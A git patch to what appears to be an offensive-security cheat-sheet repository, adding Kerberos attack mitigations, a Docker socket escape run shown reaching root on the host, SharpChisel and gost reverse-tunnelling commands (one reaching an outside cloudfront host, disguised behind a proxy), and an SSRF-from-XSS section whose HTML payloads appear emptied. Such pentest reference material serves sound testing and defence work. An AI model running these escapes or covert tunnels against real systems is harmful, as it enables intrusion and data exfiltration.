From ecf29c2cbe6c61261e67de657cc712f8dc245c4d Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 18 Jun 2020 11:55:48 +0200
Subject: [PATCH] Active Directory - Mitigations
---
 .../Active Directory Attack.md | 17 +++++++-
 .../Container - Docker Pentest.md | 28 ++++++++++++-
 .../Network Pivoting Techniques.md | 39 ++++++++++++++++++-
 Server Side Request Forgery/README.md | 20 ++++++++++
 4 files changed, 100 insertions(+), 4 deletions(-)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 0e206fa..ad4ff3c 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -715,6 +715,11 @@ root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi veloci
 Converting kirbi => ccache
 ```
+
+Mitigations:
+* Hard to detect because they are legit TGT tickets
+* Mimikatz generate a golden ticket with a life-span of 10 years
+
 ### Pass-the-Ticket Silver Tickets
 Forging a TGS require machine accound password (key) or NTLM hash from the KDC
@@ -734,6 +739,9 @@ root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache
 root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
 ```
+Mitigations:
+* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket.
+
 ### Kerberoasting
 > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
@@ -772,7 +780,7 @@ Then crack the ticket with hashcat or john
 ```
 Mitigations:
-* Have a very long password for your accounts with SPNs (> 25 characters)
+* Have a very long password for your accounts with SPNs (> 32 characters)
 * Make sure no users have SPNs
 ### KRB_AS_REP Roasting
@@ -834,6 +842,9 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4r
 root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
 ```
+Mitigations:
+* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
+
 ### Pass-the-Hash
 The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.
@@ -1595,6 +1606,7 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5
 ## References
+* [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/)
 * [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
 * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
 * [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf)
@@ -1660,4 +1672,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5
 * [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation)
 * [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/)
 * [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/)
-* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
\ No newline at end of file
+* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
+* [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html)
\ No newline at end of file
diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md
index 26ca5d9..55b3cb3 100644
--- a/Methodology and Resources/Container - Docker Pentest.md
+++ b/Methodology and Resources/Container - Docker Pentest.md
@@ -33,6 +33,31 @@ curl -XPOST –unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Conte
 curl -XPOST –unix-socket /var/run/docker.sock http://localhost/containers/ID_FROM_PREVIOUS_COMMAND/start
 ```
+Exploit using [brompwnie/ed](https://github.com/brompwnie/ed)
+
+```powershell
+root@37bb034797d1:/tmp# ./ed_linux_amd64 -path=/var/run/ -autopwn=true
+[+] Hunt dem Socks
+[+] Hunting Down UNIX Domain Sockets from: /var/run/
+[*] Valid Socket: /var/run/docker.sock
+[+] Attempting to autopwn
+[+] Hunting Docker Socks
+[+] Attempting to Autopwn: /var/run/docker.sock
+[*] Getting Docker client...
+[*] Successfully got Docker client...
+[+] Attempting to escape to host...
+[+] Attempting in TTY Mode
+chroot /host && clear
+echo 'You are now on the underlying host'
+chroot /host && clear
+echo 'You are now on the underlying host'
+/ # chroot /host && clear
+/ # echo 'You are now on the underlying host'
+You are now on the underlying host
+/ # id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
+```
+
 ## Open Docker API Port
@@ -146,4 +171,5 @@ $ docker run --rm cve-2019-5736:malicious_image_POC
 - [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0)
 - [Breaking out of Docker via runC – Explaining CVE-2019-5736 - Yuval Avrahami - February 21, 2019](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)
 - [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host - dragonsector.pl](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html)
-- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md)
\ No newline at end of file
+- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md)
+- [Anatomy of a hack: Docker Registry - NotSoSecure - April 6, 2017](https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/)
\ No newline at end of file
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index 78958b0..cd4bc9e 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md
+++ b/Methodology and Resources/Network Pivoting Techniques.md
@@ -12,6 +12,8 @@
 * [Metasploit](#metasploit)
 * [sshuttle](#sshuttle)
 * [chisel](#chisel)
+ * [SharpChisel](#sharpchisel)
+* [gost](#gost)
 * [Rpivot](#rpivot)
 * [RevSocks](#revsocks)
 * [plink](#plink)
@@ -170,6 +172,40 @@ user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:
 user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
 ```
+### SharpChisel
+
+A C# Wrapper of Chisel : https://github.com/shantanu561993/SharpChisel
+
+```powershell
+user@hacker$ ./chisel server -p 8080 --key "private" --auth "user:pass" --reverse --proxy "https://www.google.com"
+================================================================
+server : run the Server Component of chisel
+-p 8080 : run server on port 8080
+--key "private": use "private" string to seed the generation of a ECDSA public and private key pair
+--auth "user:pass" : Creds required to connect to the server
+--reverse: Allow clients to specify reverse port forwarding remotes in addition to normal remotes.
+--proxy https://www.google.com : Specifies another HTTP server to proxy requests to when chisel receives a normal HTTP request. Useful for hiding chisel in plain sight.
+
+user@victim$ SharpChisel.exe client --auth user:pass https://redacted.cloudfront.net R:1080:socks
+```
+
+## Gost
+
+> Wiki English : https://docs.ginuerzh.xyz/gost/en/
+
+```powershell
+git clone https://github.com/ginuerzh/gost
+cd gost/cmd/gost
+go build
+
+# Socks5 Proxy
+Server side: gost -L=socks5://:1080
+Client side: gost -L=:8080 -F=socks5://server_ip:1080?notls=true
+
+# Local Port Forward
+gost -L=tcp://:2222/192.168.1.1:22 [-F=..]
+```
+
 ## Rpivot
 Server (Attacker box)
@@ -305,4 +341,5 @@ unzip ngrok-stable-linux-amd64.zip
 * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)
 * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
 * [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
-* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
\ No newline at end of file
+* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
+* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
\ No newline at end of file
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index 38318b2..19ba16e 100644
--- a/Server Side Request Forgery/README.md
+++ b/Server Side Request Forgery/README.md
@@ -33,6 +33,7 @@
 * [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)
 * [SSRF exploiting Redis](#ssrf-exploiting-redis)
 * [SSRF to XSS](#ssrf-to-xss)
+* [SSRF from XSS](#ssrf-from-xss)
 * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
 * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
 * [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs)
@@ -426,6 +427,25 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple
 https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
 ```
+## SSRF from XSS
+
+### Using an iframe
+
+The content of the file will be integrated inside the PDF as an image or text.
+
+```html
+
+```
+
+### Using an attachment
+
+Example of a PDF attachment using HTML
+
+1. use `` as Bio text
+2. use 'Download Data' feature to get PDF
+3. use `pdfdetach -saveall filename.pdf` to extract embedded resource
+4. `cat attachment.bin`
+
 ## SSRF URL for Cloud Instances
 ### SSRF URL for AWS Bucket